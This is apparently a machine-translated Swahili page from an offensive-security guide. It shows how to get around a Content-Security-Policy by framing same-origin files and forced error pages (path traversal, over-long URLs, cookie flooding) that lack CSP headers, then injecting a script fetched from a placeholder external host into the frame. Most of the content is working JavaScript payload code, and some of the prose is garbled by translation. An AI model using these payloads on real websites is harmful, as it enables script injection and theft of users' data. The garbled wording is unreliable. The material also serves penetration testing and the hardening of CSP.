A configuration such as:
```
Content-Security-Policy: default-src 'self' 'unsafe-inline';
```
Inakataza matumizi ya kazi zozote zinazotekeleza msimbo uliotumwa kama mfuatano. Kwa mfano: `eval, setTimeout, setInterval` zote zitazuiliwa kwa sababu ya mipangilio ya `unsafe-eval`

Maudhui yoyote kutoka vyanzo vya nje pia yanazuiliwa, ikiwa ni pamoja na picha, CSS, WebSockets, na, hasa, JS

### Kupitia Maandishi & Picha

Imek observed kwamba vivinjari vya kisasa vinabadilisha picha na maandiko kuwa HTML ili kuboresha uonyeshaji wao (kwa mfano, kuweka mandharinyuma, kuzingatia, n.k.). Kwa hivyo, ikiwa picha au faili ya maandiko, kama `favicon.ico` au `robots.txt`, itafunguliwa kupitia `iframe`, inatolewa kama HTML. Kwa kuzingatia, kurasa hizi mara nyingi hazina vichwa vya CSP na zinaweza kutokuwa na X-Frame-Options, ikiruhusu utekelezaji wa JavaScript isiyo na mpangilio kutoka kwao:
```javascript
frame = document.createElement("iframe")
frame.src = "/css/bootstrap.min.css"
document.body.appendChild(frame)
script = document.createElement("script")
script.src = "//example.com/csp.js"
window.frames[0].document.head.appendChild(script)
```
### Makosa ya Via

Vivyo hivyo, majibu ya makosa, kama vile faili za maandiko au picha, kwa kawaida yanakuja bila vichwa vya CSP na yanaweza kukosa X-Frame-Options. Makosa yanaweza kusababisha kupakia ndani ya iframe, kuruhusu hatua zifuatazo:
```javascript
// Inducing an nginx error
frame = document.createElement("iframe")
frame.src = "/%2e%2e%2f"
document.body.appendChild(frame)

// Triggering an error with a long URL
frame = document.createElement("iframe")
frame.src = "/" + "A".repeat(20000)
document.body.appendChild(frame)

// Generating an error via extensive cookies
for (var i = 0; i < 5; i++) {
document.cookie = i + "=" + "a".repeat(4000)
}
frame = document.createElement("iframe")
frame.src = "/"
document.body.appendChild(frame)
// Removal of cookies is crucial post-execution
for (var i = 0; i < 5; i++) {
document.cookie = i + "="
}
```
Baada ya kuanzisha mojawapo ya hali zilizotajwa, utekelezaji wa JavaScript ndani ya iframe unaweza kupatikana kama ifuatavyo:
```javascript
script = document.createElement("script")
script.src = "//example.com/csp.js"
window.frames[0].document.head.appendChild(script)
```
## Marejeo

- [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)

{{#include ../../banners/hacktricks-training.md}}